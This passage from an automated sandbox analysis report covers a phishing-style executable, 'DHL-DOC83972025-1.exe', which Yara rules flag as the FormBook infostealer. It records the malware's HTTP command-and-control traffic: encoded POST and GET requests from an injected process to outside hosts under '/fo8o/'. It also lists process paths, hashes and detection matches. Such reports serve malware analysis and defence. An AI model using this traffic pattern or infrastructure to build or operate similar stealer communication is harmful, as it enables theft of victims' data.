tjVTF=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCvOPcXxrdJoJE6uXemuhndI244nMz/wK9+fHBmtGDek0YXFjY4OL/m7bifU3N+rRYdxyGC77j2DzpDagrjfKFjFePwi3lB2G5ikofL2T2H8lj8BocUr6dwAn6RMH4qsmIM2Z03FtWMQmKCf/na0SQoqW9YuLKasS5ovDvMH9TqShjuH+vHZ5Z0Q70tNGE0asNECvoPhAqAZq5FsORlreZaKHeo+EAz+B/w6R0NC58K3eQH9EP2SzXxHXRpuACufIzpCxgpzw8i1mkRVYitm2goZ+/ixj47rvjfEFpuvNwsVGrC9Ifw2YrdCRtt6C8W3LYNMRo5bYRsp5nM/eqiKZoxDflpLJCB1lRodrNt9wL04Nd7adEqOILL5/6q0q+bu10hfKbeXTHwmad3EfxeVQmO72bsYEpgRn4m0ARNwjYtA65YOS7JXA8qQbK9xEv/in+OrZPJoNm++Q2Ml2G3CjwTVwxuY6wk3GJOtREbdAwEduKbLiFFAMZhBe1HJZst1zV3/yLKsWMLUyEnXJMlkNI6BEFmEyU+qJOWxkDp7bE/n2nTR3tx3hmt0KagIEgQR47GXnnnh724DU5+HxVsx6tXkDDTF6Uu1e+TCZxwY8kbZmbeLq4pB6gRXTcZzsbk4JdOwgt0xmriPW6DV2v2kv2ja/mpjKYncWXoDQoSZV0ejDIOnstC7tZI2CPklxxAJ9px02osJwm7n0gf/uQMCgaLXB8fYcD2DM28uXdYFXQA0UuMOjSYV4zSK/FUVuP/uM/5sOgUflyJIgaCNGFkxsuhuYeOnCEWNnhmnk/QUj8gkXgZCt5eM5YwZ3aqTmZRVbWFhxfMy1fbrPb2m/R9ZGDB09NzhOyMr/o2Zo3N2OVY9YOBPgylUm0qcgYNb73AduKR9kNvgP7N6s0jlwHTczZpUonfZAgRs2iBExmIDZERJjMVKf0w0TgcZFbFsyAxCbD6wSE7 [TRUNCATED]
Jan 9, 2025 09:44:21.331037998 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:21 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	61308	195.110.124.133	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:23.188357115 CET	536	OUT	GET /fo8o/?tjVTF=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMnVmQq+lm2z9nd9BQOLzJZJregrcunvpsiXNjQ3cRjwhNT6H4Su73WUG&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.elettrosistemista.zip Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:44:23.857021093 CET	367	IN	HTTP/1.1 404 Not Found Date: Thu, 09 Jan 2025 08:44:23 GMT Server: Apache Content-Length: 203 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	61309	217.196.55.202	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:45.311732054 CET	801	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 218 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 54 36 34 44 63 33 64 49 31 77 6c 57 4b 32 63 54 4b 55 30 61 2b 74 45 47 77 74 65 42 6d 32 75 48 6f 39 6e 51 51 56 70 4e 50 36 74 62 7a 2f 57 33 51 46 47 4a 69 33 77 63 37 67 2b 65 59 61 32 39 43 78 2f 50 68 6c 4c 47 46 56 54 31 71 66 55 4f 71 51 56 54 70 7a 4c 5a 43 6e 2b 59 30 58 6a 48 4b 70 2b 35 7a 6b 6a 49 38 69 75 50 6c 51 58 33 73 58 51 47 6d 6c 45 74 75 2f 4e 69 7a 70 55 4e 49 47 67 64 50 6f 33 51 52 76 55 6f 4f 6a 2b 68 6f 30 4a 75 2f 51 59 6b 65 2b 4f 7a 37 50 64 43 47 4d 46 50 79 44 38 62 77 31 43 35 44 79 7a 46 36 4b 63 38 35 2b 34 6c 6a 58 69 6e 41 61 33 44 75 31 54 4f 67 3d 3d Data Ascii: tjVTF=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0Ju/QYke+Oz7PdCGMFPyD8bw1C5DyzF6Kc85+4ljXinAa3Du1TOg==
Jan 9, 2025 09:44:45.872419119 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 09 Jan 2025 08:44:45 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	61310	217.196.55.202	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:47.843164921 CET	821	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 238 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 65 75 48 4b 6c 6e 52 52 56 70 44 76 36 74 54 54 2f 54 71 67 46 4a 4a 69 37 34 63 36 4d 2b 65 5a 36 32 39 44 68 2f 50 53 39 4b 48 56 56 56 2b 4b 66 53 41 4b 51 56 54 70 7a 4c 5a 42 61 70 59 30 76 6a 45 36 5a 2b 35 53 6b 67 46 63 69 74 48 46 51 58 39 4d 57 5a 47 6d 6b 52 74 73 62 33 69 77 42 55 4e 4a 57 67 54 36 63 30 4c 68 76 4f 6c 75 69 68 74 4a 52 2b 6a 50 34 65 6c 4e 69 46 35 5a 72 6b 44 77 52 6e 56 51 50 51 46 68 4e 35 39 42 57 46 53 63 58 70 2b 34 36 67 6f 42 6a 44 34 33 2f 64 4f 38 55 58 59 54 66 6a 67 79 6c 69 74 2b 70 47 49 75 48 55 78 52 31 54 72 35 38 3d Data Ascii: tjVTF=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BweuHKlnRRVpDv6tTT/TqgFJJi74c6M+eZ629Dh/PS9KHVVV+KfSAKQVTpzLZBapY0vjE6Z+5SkgFcitHFQX9MWZGmkRtsb3iwBUNJWgT6c0LhvOluihtJR+jP4elNiF5ZrkDwRnVQPQFhN59BWFScXp+46goBjD43/dO8UXYTfjgylit+pGIuHUxR1Tr58=
Jan 9, 2025 09:44:48.410559893 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 09 Jan 2025 08:44:48 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	61311	217.196.55.202	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:50.380079031 CET	1834	OUT	POST /fo8o/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Accept-Encoding: gzip, deflate, br Host: www.empowermedeco.com Origin: http://www.empowermedeco.com Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1250 Referer: http://www.empowermedeco.com/fo8o/ User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Data Raw: 74 6a 56 54 46 3d 72 7a 50 78 39 57 50 50 4e 34 6f 48 54 79 4b 34 47 37 72 64 4f 56 77 6d 61 71 32 63 61 71 55 77 61 2b 68 45 47 78 5a 33 42 77 6d 75 48 5a 74 6e 65 53 4e 70 43 76 36 74 64 7a 2f 53 71 67 46 51 4a 69 6a 43 63 36 51 41 65 63 2b 32 37 6b 68 2f 48 48 4a 4b 4a 56 56 56 78 71 66 58 4f 71 52 49 54 70 6a 50 5a 42 4b 70 59 30 76 6a 45 38 31 2b 77 6a 6b 67 44 63 69 75 50 6c 52 57 33 73 57 31 47 6d 73 42 74 73 4f 41 68 41 68 55 4f 70 6d 67 52 49 45 30 57 52 76 49 6b 75 69 70 74 4a 74 68 6a 50 6c 68 6c 4f 2b 6a 35 5a 54 6b 50 42 6f 68 4a 79 66 57 61 6e 4e 6e 6a 48 44 6c 59 50 7a 59 2f 49 65 55 6e 42 69 74 7a 51 37 57 4b 66 49 72 65 57 47 34 31 45 73 63 6a 71 41 54 48 37 53 44 6c 42 70 58 2b 39 48 73 46 75 43 6e 4a 53 48 68 41 67 54 68 49 79 76 52 2b 42 47 43 61 64 30 75 4c 6f 70 32 6c 41 6f 34 6d 4f 65 5a 6a 43 72 67 79 71 76 4c 71 5a 7a 4f 31 4f 5a 6e 37 68 75 36 4b 34 66 72 2f 45 38 33 6d 73 46 76 45 61 79 51 6b 63 48 4c 39 78 42 44 7a 54 6a 52 77 43 4a 62 76 47 36 55 67 47 4c 4c 38 30 33 65 [TRUNCATED] Data Ascii: tjVTF=rzPx9WPPN4oHTyK4G7rdOVwmaq2caqUwa+hEGxZ3BwmuHZtneSNpCv6tdz/SqgFQJijCc6QAec+27kh/HHJKJVVVxqfXOqRITpjPZBKpY0vjE81+wjkgDciuPlRW3sW1GmsBtsOAhAhUOpmgRIE0WRvIkuiptJthjPlhlO+j5ZTkPBohJyfWanNnjHDlYPzY/IeUnBitzQ7WKfIreWG41EscjqATH7SDlBpX+9HsFuCnJSHhAgThIyvR+BGCad0uLop2lAo4mOeZjCrgyqvLqZzO1OZn7hu6K4fr/E83msFvEayQkcHL9xBDzTjRwCJbvG6UgGLL803eV87ixRjkXYPl2e5FDOjxQX427zjUnUZjVjptuwgpmwelJA19UL29C3XJf4vPIK6ATY0nVxKPNo2ZzjLvOyX6Lp1QW7PSxZVU4ZA0ZpSPGyBxspQZYANQ2s2AzdyARGRFQe8cDa88hWKqJV2mMu9smqUrpMvCSXzUB59W3sVu3jKhWAT2SvDCRlFEmNor+Iz5Mj0meX2kXGxCyClJhMJzMeeIC992mmDpHwDCVa6DwjzurdIG7M1T1aooykbjpzE9w5PHBzk9ijk/DKisoqh3y41CY9YeV6i1RhBhDLTNO4+WbagvuYEFKWjiMSdBfbRme/KuWO+jCBiCLQaYOxvHpDcSEc9z4CUScoVuVRAfBZvMbpYWtd1ZAQts3/xl2HKnv07y0iOaUWnXR132C2f2e2F1H14CipMz0/xLR7tXlIO6opU/ywLFoo5x/oB0Clx0BiXpMBJvG87ElBps7UJH3/HiWJyZos4nnd3kaWv/HI89O+p2RZkWf5vbCTJINkLQuhRSOrexn3bf5T7A6vtkZo7xkkolqONqVWX3iwJj0v5KMFm8KeFk+gl+DjX7RqqUwpFUVhjfN2bMjUI/RnH6Fq6YrbSI2f6LA4+Usw13scdElY6icLDr6r6jaL2wS15NnpN770ATFqCD0h0xsmZHuVfQxc8hxos9LZ [TRUNCATED]
Jan 9, 2025 09:44:50.934253931 CET	1085	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 09 Jan 2025 08:44:50 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/ platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	61312	217.196.55.202	80	5200	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 09:44:52.907601118 CET	532	OUT	GET /fo8o/?tjVTF=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&2na=ihrTFVnP9VKx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en Host: www.empowermedeco.com Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Jan 9, 2025 09:44:53.483264923 CET	1236	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 09 Jan 2025 08:44:53 GMT server: LiteSpeed location: https://www.empowermedeco.com/fo8o/?tjVTF=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYVFf0Y/CRrIidra9fUChJErWJpFnwi4qHc/7DUMj+ceuAXwSmcXIkD1z&2na=ihrTFVnP9VKx platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></
Jan 9, 2025 09:44:53.483278990 CET	13	IN	Data Raw: 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: body></html>

Target ID:	0
Start time:	03:41:02
Start date:	09/01/2025
Path:	C:\Users\user\Desktop\DHL-DOC83972025-1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL-DOC83972025-1.exe"
Imagebase:	0x3f0000
File size:	1'579'008 bytes
MD5 hash:	7E709C914C89CD047067DFDAE9F83195
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	03:41:03
Start date:	09/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DHL-DOC83972025-1.exe"
Imagebase:	0x610000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1403314556.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1402648327.00000000003B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.1403351196.00000000033D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:41:10
Start date:	09/01/2025
Path:	C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\kYrcqWqjRwHMgjDlajndACeFrDzkVXfXLHZdplkqysurezqgFyY\CKQtyFoaVDYewUznZxosidSwbd.exe"
Imagebase:	0xf60000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
